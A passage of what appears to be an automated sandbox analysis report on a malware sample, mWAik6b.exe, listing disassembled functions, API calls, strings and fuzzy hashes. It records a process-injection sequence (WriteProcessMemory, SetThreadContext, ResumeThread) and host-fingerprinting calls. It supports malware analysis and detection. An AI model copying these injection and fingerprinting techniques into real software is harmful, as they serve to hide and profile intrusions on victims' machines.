WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 024A825E
Wow64SetThreadContext.KERNEL32(00000390,02480000), ref: 024A829A
ResumeThread.KERNELBASE(00000390), ref: 024A82A9

Strings

TerminateProcess, xrefs: 024A818C

Memory Dump Source

Source File: 00000000.00000002.2237143554.00000000024A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a7000_mWAik6b.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 6b17728a26a1ba351893947ec41d0d8b356c1e224319ad151686e5da27d4e04e
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 94314D72244246ABD734CF54CC91FEA73A5BFC8B14F158509EB09AF281C6B0BA418B94

Function 008C2880 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2236499381.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4165435f5b696cb3ed034d83180693ecc4059f3ef8d4a783ae924532d8504652
Instruction ID: 2edac84e85ad8f5ea42aea72920101dfafd7f8a4b77921a90b3cb3f0712c20eb
Opcode Fuzzy Hash: 4165435f5b696cb3ed034d83180693ecc4059f3ef8d4a783ae924532d8504652
Instruction Fuzzy Hash: DDA11570A002699FCB15DFA9D490AADFBF1FF58314F28C659E459E7252C330A881CBA4

Function 008C2104 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 008C2B49

Memory Dump Source

Source File: 00000000.00000002.2236499381.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_mWAik6b.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 08d19943591cd4bbe3e990b03c9f6d8237574f04abfee52a72f717abd93e2939
Instruction ID: fdb2518c678feb22abc5b78a59d5fc37f3741fc254b0a852d7c241334067e14a
Opcode Fuzzy Hash: 08d19943591cd4bbe3e990b03c9f6d8237574f04abfee52a72f717abd93e2939
Instruction Fuzzy Hash: FC21C2B5D0161DAFCB00DF9AD884ADEFBB4FB49310F10812AE918A7250D374A954CFE5

Analysis Process: mWAik6b.exePID: 940, Parent PID: 2944COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	69%
Total number of Nodes:	348
Total number of Limit Nodes:	22

Executed Functions

Function 0043A5E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 645
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(@IJK,00000000,00000001,F3F2F1FD,00000000), ref: 0043A8CD
SysAllocString.OLEAUT32(93AC5B3B), ref: 0043A946
CoSetProxyBlanket.COMBASE(3E38FAA6,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A984
SysAllocString.OLEAUT32(B6E0B0E8), ref: 0043A9E9
SysAllocString.OLEAUT32(E43AE606), ref: 0043AAB2
VariantInit.OLEAUT32(?), ref: 0043AB24
VariantClear.OLEAUT32(?), ref: 0043AC74
SysFreeString.OLEAUT32(?), ref: 0043AC98
SysFreeString.OLEAUT32(?), ref: 0043AC9E
SysFreeString.OLEAUT32(00000000), ref: 0043ACB2
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,93AC5B3B,00000000,00000000,00000000,00000000), ref: 0043ACE3

Strings

@IJK, xrefs: 0043A610
1>, xrefs: 0043A9FB
S;M, xrefs: 0043A8DB
,C.}, xrefs: 0043A8FB
~G(&, xrefs: 0043A807
nG(&, xrefs: 0043A7D8
?G5A, xrefs: 0043A8F3
:, xrefs: 0043A73B

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: S;M$,C.}$1>$:$?G5A$@IJK$nG(&$~G(&
API String ID: 2573436264-2772922692
Opcode ID: da629e57f63015a9c389497c16c4dc5391b223c6f7837b5b1eeed4cd0f73d98b
Instruction ID: 5985474516b47b6c1a9faa6d824ff9722f2614eb3eabf9417dd0f8c4aa3c9ad8
Opcode Fuzzy Hash: da629e57f63015a9c389497c16c4dc5391b223c6f7837b5b1eeed4cd0f73d98b
Instruction Fuzzy Hash: 3422E975A483409FE310CF28C880B9BBBE5EBC9314F14992DE5D99B2A1D778D805CB97

Function 004361B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004361F0
GetSystemMetrics.USER32 ref: 00436200
DeleteObject.GDI32 ref: 00436243
SelectObject.GDI32 ref: 00436293
SelectObject.GDI32 ref: 004362EA
DeleteObject.GDI32 ref: 00436318

Strings

fC, xrefs: 0043636E
[iC, xrefs: 004363A5
F6!N, xrefs: 00436329
4fC, xrefs: 004363F2
, xrefs: 004362C1

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $4fC$F6!N$[iC$fC
API String ID: 3911056724-78709177
Opcode ID: 4e54b1156f46837110023b9f57f5fd3c5b85bb095aa482201ca79965f1b273d1
Instruction ID: bb81f30a9f5876ddf4aa7c3b53746c2368f33a00f551faf7590d58348a7f966f
Opcode Fuzzy Hash: 4e54b1156f46837110023b9f57f5fd3c5b85bb095aa482201ca79965f1b273d1
Instruction Fuzzy Hash: 837166B04197808FE360EF65D98878EBBE0BBC5708F51891EE5D89B250DBB45448CF87

Function 00420BA0 Relevance: 16.7, Strings: 13, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 00420D61
M, xrefs: 0042109E
@, xrefs: 00420DE4
L, xrefs: 00420DD0
B, xrefs: 00420DDA
C, xrefs: 00420DDF
R, xrefs: 00420D6B
!@, xrefs: 00420BD3
], xrefs: 00420D66
}, xrefs: 00420DCB
,, xrefs: 0042100E
J, xrefs: 004210A8
I, xrefs: 004210A3

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$@$B$C$I$J$L$M$R$\$]$}
API String ID: 1279760036-1120542364
Opcode ID: e06bbe348a4304636f8b219e4fe7b28ad15d815e0ebb9841dad544f937a5a5c8
Instruction ID: 157a8e2f561f5ccc7da446f734911416100d03f92a274c8de8e3b1fe340459a7
Opcode Fuzzy Hash: e06bbe348a4304636f8b219e4fe7b28ad15d815e0ebb9841dad544f937a5a5c8
Instruction Fuzzy Hash: 0302AE7160C3608FD324CF28D44436FBBE2ABD9314F558A2EE1D9873A2D77998458B4B

Function 00424050 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 575
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424133
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004241EA

Strings

3['E, xrefs: 00424380
;8, xrefs: 00424096
:_-Y, xrefs: 00424496
X[, xrefs: 00424588
D@, xrefs: 00424578
SL, xrefs: 00424580

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 3['E$:_-Y$;8$D@$SL$X[
API String ID: 237503144-4112931091
Opcode ID: a07caa98abe506f063f4130f1653f2fe3134142310136db010a344f7be73cbed
Instruction ID: 60eafbf21fbf3127c15a03e93e3c494839048f86b397655564221d09e984a81b
Opcode Fuzzy Hash: a07caa98abe506f063f4130f1653f2fe3134142310136db010a344f7be73cbed
Instruction Fuzzy Hash: BF022FB56083548FD310DF65E88126BBBE1FBC5344F14892DF9D58B350EBB89906CB86

Function 004086B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004086D4
GetCurrentThreadId.KERNEL32 ref: 004086DE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087A2
GetForegroundWindow.USER32 ref: 004087B7
ExitProcess.KERNEL32 ref: 00408917

Strings

&:, xrefs: 004086EB

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: &:
API String ID: 4063528623-1752886865
Opcode ID: 169a32c55f6ff262bbd8d02f98e5ec62c91dc29f1bde65e51cef4688554a26c2
Instruction ID: 036560ca4111f5e7ecce0a739366ca84d161b23d80b076a90d52c525e0c1b424
Opcode Fuzzy Hash: 169a32c55f6ff262bbd8d02f98e5ec62c91dc29f1bde65e51cef4688554a26c2
Instruction Fuzzy Hash: 235176B3F103140BC7186E799D52356B6C79BC5314F1F853EA882EB3E6ED7988028699

Function 0041734A Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 908COMMON

Download Yara Rule

Strings

\}A, xrefs: 00417A27, 00417D56
*7)), xrefs: 00417745

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: *7))$\}A
API String ID: 0-1570683552
Opcode ID: e9e37dad1544a76698409319f21d22744e5846338d98e5c544e44a7936268ca1
Instruction ID: 2c7540a860bd979036ba93ec2d6abef0451b0b41cda9469a079dd693cc802df7
Opcode Fuzzy Hash: e9e37dad1544a76698409319f21d22744e5846338d98e5c544e44a7936268ca1
Instruction Fuzzy Hash: 056231B45047018FD724CF28D881667B7B2FF46314F198A2ED49A8B792E738F892CB55

Function 00427A00 Relevance: 5.3, Strings: 4, Instructions: 324
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f4kl, xrefs: 00427D1C
i, xrefs: 00427D24
pedu, xrefs: 00427D14
(, xrefs: 00427B53

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID: f4kl$i$pedu$(
API String ID: 2994545307-2864204077
Opcode ID: 8027afebd5cc4665657b3f038854df0e719cbaae28e550e07bcd45e617562cb5
Instruction ID: e0aedbb0e4675fbf1985af87ecba576ed208629cc0295d4850e1693e8caaea87
Opcode Fuzzy Hash: 8027afebd5cc4665657b3f038854df0e719cbaae28e550e07bcd45e617562cb5
Instruction Fuzzy Hash: B2917CB2F083205BD3109E76EC8262BB7D1DFC5324F59863EE89597381E63D9D05838A

Function 0042E2AC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E75E

Strings

wbPb, xrefs: 0042E88D

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: wbPb
API String ID: 3960555810-2247624023
Opcode ID: c53d22b7eeba8885e02db97d7904cda18866f2e59bb46a9f874bb5f0e6408eb9
Instruction ID: d9ca414ca8b870e01a5246aeb0419e6747ea64e100486a52127a8d92b944c332
Opcode Fuzzy Hash: c53d22b7eeba8885e02db97d7904cda18866f2e59bb46a9f874bb5f0e6408eb9
Instruction Fuzzy Hash: 92C1D5706056928BDB19CF3A9450323FBE2AFA7300F28D59ED4D68B786D3399842CB55

Function 0041095C Relevance: 2.4, APIs: 1, Instructions: 924COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce655208a9e39821545b6890dd47f5cf7e4c9e1a2635a24d580d70fa6e9cd2c
Instruction ID: 95bba1d8f348dfd926d8cf433ff28fa22eb7d3d8fbdb803361d40147ce9e3657
Opcode Fuzzy Hash: 9ce655208a9e39821545b6890dd47f5cf7e4c9e1a2635a24d580d70fa6e9cd2c
Instruction Fuzzy Hash: FE72FA76604B408FD714DF38C9853A6BBE2AB85314F198A3ED4EBC77D1E638A545CB02

Function 0043EF30 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00441CF0,?,00000018,?,?,00000018,?,?,?), ref: 0043EF5E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00441BA0 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

@, xrefs: 00441C7A

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: d2bd5b72376283c24bb44b7a37b974a3844707c119ca00f1f517c905320bbbf4
Instruction ID: 7c6e8be97ec7731e9ad9a50c4879d693c651ee70ecd62fe68275c38026178db7
Opcode Fuzzy Hash: d2bd5b72376283c24bb44b7a37b974a3844707c119ca00f1f517c905320bbbf4
Instruction Fuzzy Hash: 01315571A443009BE714CF54CC95A2BB7F1EF85318F05852EE9998B3E0E739A949C786

Function 0042EAD2 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

E?sB, xrefs: 0042EAD3

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID: E?sB
API String ID: 2994545307-1048174391
Opcode ID: 770186e44843b778794a8fae440417d11ff113e4907133ed2eadd8498f5432eb
Instruction ID: 286096024ede14c21f1e5b8dc750017c638cd025a402e33ab74259a3e3e4e948
Opcode Fuzzy Hash: 770186e44843b778794a8fae440417d11ff113e4907133ed2eadd8498f5432eb
Instruction Fuzzy Hash: C9214730615A508AEB198F3AD820736BB92AF47304F58835ED0D7977D6CB2DB812C758

Function 00440DF0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

@, xrefs: 00440E57

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: a6bdbf5aa3b788deab623bbdccb104fd145a9441af9656b6a93166c977c4f2a9
Instruction ID: c7e170592f7b740470b14c6fe7e1a6e5e5ad0f8f221948f4ef1b2be7170c20e4
Opcode Fuzzy Hash: a6bdbf5aa3b788deab623bbdccb104fd145a9441af9656b6a93166c977c4f2a9
Instruction Fuzzy Hash: 102149714093049FD3148F18D8C162BF7B5EFC6324F259A2DEAA8073D0D37698288B9A

Function 00440ED0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a4889a86262d2699285de0f9539d4cedd412aaa4aa7de9bf9f896a6bdfbb2db
Instruction ID: 3456d00c2b49cd3bf234c0514189fd438fcf6f65ee1b437ae50faf38d3aa8765
Opcode Fuzzy Hash: 5a4889a86262d2699285de0f9539d4cedd412aaa4aa7de9bf9f896a6bdfbb2db
Instruction Fuzzy Hash: 31918A72A097104BE718DE28DC8062FB793BFD8320F19C63DE9D58B3A5EA749C458745

Function 00441750 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bbff2dae2bbe3c6816aba2c5524b90667d968de1dd5dfa4b8fd30fa38b6695d
Instruction ID: 921a3f47200d8e694167fff3dde371beddebeeb7d78b9489eb8b8169be34c6cf
Opcode Fuzzy Hash: 2bbff2dae2bbe3c6816aba2c5524b90667d968de1dd5dfa4b8fd30fa38b6695d
Instruction Fuzzy Hash: 517147757183004BE318DE25D88067BB7A3EBC5364F1DC63EE4A98B3A1D7399C46874A

Function 0043D450 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d5b5d881e10d8a53f9304ca197d662aabc7833ae0c4cf5f46f613eb0904468
Instruction ID: c3b623652d36f59f6ecc49c65232d072acfa03e6ccd09f2bd701e8607b6eeef5
Opcode Fuzzy Hash: e2d5b5d881e10d8a53f9304ca197d662aabc7833ae0c4cf5f46f613eb0904468
Instruction Fuzzy Hash: 44517E36E043005BD7108F24EC8276BB7D2EBD9324F1A962DD4D957391D235AC068B99

Function 004347BD Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d602a30d7ce30917ac3b010c22e0804f40f31b319eb4d3f8b06b4e3cfbd8b08
Instruction ID: 5ca4fb3a12703c5312f55497a9e9fe36ecf749290688e618fcccdd9dd4b6eebe
Opcode Fuzzy Hash: 4d602a30d7ce30917ac3b010c22e0804f40f31b319eb4d3f8b06b4e3cfbd8b08
Instruction Fuzzy Hash: 48813C31108BC28ED325CB3C8849B46BFD26B96224F19C7ACD0F94B3E2C7789506CB56

Function 0043A490 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1afcb714a6743234a3e666a7f0991ba5e13aa50c1bc12502d5c68f21b313f8ec
Instruction ID: 22e42b1c34829c1bca3d66fdee3d8cf3cdc863a6d00b3efea563a93e6afef01c
Opcode Fuzzy Hash: 1afcb714a6743234a3e666a7f0991ba5e13aa50c1bc12502d5c68f21b313f8ec
Instruction Fuzzy Hash: 5E314F746812006BE7189B299C90A3B73A6EB8D315F19663DE1D7432E0E3346C319A0B

Function 0040D22E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0214fc76d68e595672e3475fe98d694cead03254d0a4adc6fc1a4f20e720711c
Instruction ID: 5c57006ad8233bfc5ebcdb89710419ebefc60bc829d54376d73d5dc59cb80d42
Opcode Fuzzy Hash: 0214fc76d68e595672e3475fe98d694cead03254d0a4adc6fc1a4f20e720711c
Instruction Fuzzy Hash: AD31B4B5F015209BEA15B762AC12B6F32129F8171CF48413EE446236D3DB3C6A16859F

Function 00409B10 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b66bb7412e6704fea7051bc5500c38b76fa1314ff79336cf7b0226ef7180925
Instruction ID: 6f8ed506f1e3fd54ca54cd21f862a48454b1ed58ec89c7fb076af2327c38274b
Opcode Fuzzy Hash: 8b66bb7412e6704fea7051bc5500c38b76fa1314ff79336cf7b0226ef7180925
Instruction Fuzzy Hash: 64113B316193404FD718CF24A9445AB7BA1EFC3318F59463CE4D16B283C231D90ACB9B

Function 0042DACF Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042DAD7
GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F3BE

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 66e1106ca01b51e53e66c49623e9b491e1b8f5bae10938b4e3a39274d3b1fe74
Instruction ID: cfdc5763d46ce157d9a16029533cd606a6a9da3d89bad261fd0ce4e59aa67e05
Opcode Fuzzy Hash: 66e1106ca01b51e53e66c49623e9b491e1b8f5bae10938b4e3a39274d3b1fe74
Instruction Fuzzy Hash: 7A11C4742002428FD7218F35E850666BBE1EF47300F5845ADD4D7CB391D635A855CB15

Function 0040CA9E Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAB0
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAD2

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 0de48d065ac94c9144e44826edcbf70e60926b4b80bb791f05d4b16727094894
Instruction ID: 5dea0050c3e7561093ab298b4a75391d741ec40992f344bafc613f4a58a2b7e4
Opcode Fuzzy Hash: 0de48d065ac94c9144e44826edcbf70e60926b4b80bb791f05d4b16727094894
Instruction Fuzzy Hash: C4E0E2383C87007BF6784780AC97F003221A782F22F340324F3253E2E58AE03100450C

Function 0043F8DD Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043F8DD
GetForegroundWindow.USER32 ref: 0043F8F0

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: adbbd47b7e4fe6a40311d875cff0937dece61f8ad492c2988eaad5924af29625
Instruction ID: 707f734249836f37f6ac807264d3ad97774c7dc290fc6eb88822435ce75e38e2
Opcode Fuzzy Hash: adbbd47b7e4fe6a40311d875cff0937dece61f8ad492c2988eaad5924af29625
Instruction Fuzzy Hash: D7F0A0B77521018B9B0C9BB6EC9B1AE3697A6C521C72E423ED10A83246DE38A9054705

Function 0042E379 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E75E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: 9b5f794ddeb33f935bd8455202c8f82bec13507c2732ac4272d80e20ca8aedec
Instruction ID: c1b8f78226f988709d3d6649d82e729c8e11c3646cdf97e6c9d3b7281c0e0cd9
Opcode Fuzzy Hash: 9b5f794ddeb33f935bd8455202c8f82bec13507c2732ac4272d80e20ca8aedec
Instruction Fuzzy Hash: 4A4128617046504BDB298B3AE851337FBD39FEA300F1CC46ED496CB38AD6789402C719

Function 0042F3E7 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F4BC

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9aa72d66e942acee1bbbc09795cd044986575211dc3d4f8bcd9ec92cffa60820
Instruction ID: 0a2603f67324ae797109b40a484b9141895fd856f29b2b65fb15cdbd8d95a961
Opcode Fuzzy Hash: 9aa72d66e942acee1bbbc09795cd044986575211dc3d4f8bcd9ec92cffa60820
Instruction Fuzzy Hash: 6E21DB746447428BD715CF29C450373BBE2FFD2311F5881AED4D68B786CA78A84ACB54

Function 0042F3E1 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F4BC

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 1a66000775fda9d60318c17d332c6f170cc897aaced4c2e8835181987e01a070
Instruction ID: 4f16bf98e14b280e5630b6f83d12179a784a689606e3ed24519d17253af40dbe
Opcode Fuzzy Hash: 1a66000775fda9d60318c17d332c6f170cc897aaced4c2e8835181987e01a070
Instruction Fuzzy Hash: 0721D774640B428BD315CF29C450773B7A2FFC6321F588569D4D687785CA38B846CB54

Function 0042F293 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F3BE

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

